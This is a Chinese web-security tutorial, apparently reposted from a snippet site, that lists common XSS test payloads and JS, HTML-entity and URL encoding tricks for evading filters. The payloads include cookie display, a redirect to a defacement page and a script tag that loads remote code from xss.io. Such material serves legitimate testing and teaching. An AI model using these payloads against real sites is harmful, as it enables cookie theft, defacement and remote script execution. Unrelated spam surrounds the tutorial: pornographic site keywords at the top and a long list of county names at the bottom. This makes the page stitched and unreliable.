最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Web網(wǎng)絡(luò)安全漏洞分析XSS常用語句及編碼繞過詳解

 更新時間:2021年11月03日 10:48:57   作者:Phanton03167  
這篇文章主要為大家介紹了Web網(wǎng)絡(luò)安全漏洞分析XSS常用語句及編碼繞過詳解,有需要的朋友可以借鑒參考下希望能夠有所幫助,祝大家多多進步早日升職加薪

XSS進階

XSS常用語句及編碼繞過

XSS常用的測試語句

<img src=1 alert(1)> (顯示1)

<script>alert("xss")</script> (顯示xss)

<script>alert(document.cookie)</script> (顯示cookie)

<script>window.location="(你的黑頁地址)";</script>

<img src="javascript:alert('XSS')">

<script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

"+alert('XSS')+"

<script src="http://xss.io/a.js"></script>

<div onclick="alert('xss')">

<div onmouseenter="alert('xss')">

"onclick="alert(document.cookie)

常見的XSS的繞過編碼有JS編碼、HTML實體編碼和URL編碼。

JS編碼

JS提供了四種字符編碼的策略,如下所示。

三個八進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\145”。

兩個十六進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\x65”。

四個十六進制數(shù)字,如果個數(shù)不夠,在前面補0,例如“e”的編碼為“\u0065”。

對于一些控制字符,使用特殊的C類型的轉(zhuǎn)移風(fēng)格(例如\n和\r)。

HTML實體編碼

命名實體:以&開頭,以分號結(jié)尾的,例如“<”的編碼是“&lt;”。

字符編碼:十進制、十六進制ASCII碼或Unicode字符編碼,樣式為“&#數(shù)值;”,例如“<”可以編碼為“&#060;”和“&#x3c;”。

URL編碼

這里的URL編碼,也是兩次URL全編碼的結(jié)果。如果alert被過濾,結(jié)果為%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34。

在使用XXS編碼測試時,需要考慮HTML渲染的順序,特別是針對多種編碼組合時,要選擇合適的編碼方式進行測試。

以上就是Web網(wǎng)絡(luò)安全漏洞分析XSS常用語句及編碼繞過詳解的內(nèi)容,更多關(guān)于Web網(wǎng)絡(luò)安全漏洞的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評論

永修县| 永济市| 宁乡县| 丽江市| 湘潭县| 云梦县| 苏州市| 台南县| 长宁区| 凤山市| 嘉荫县| 福泉市| 芜湖县| 凤山市| 西林县| 阿坝县| 华安县| 平昌县| 安吉县| 镇平县| 高雄县| 屯昌县| 岳普湖县| 临夏市| 文登市| 江西省| 孝昌县| 建湖县| 福鼎市| 河北区| 周至县| 昌乐县| 天峻县| 龙江县| 麻栗坡县| 泽普县| 青冈县| 秭归县| 高要市| 任丘市| 拉萨市|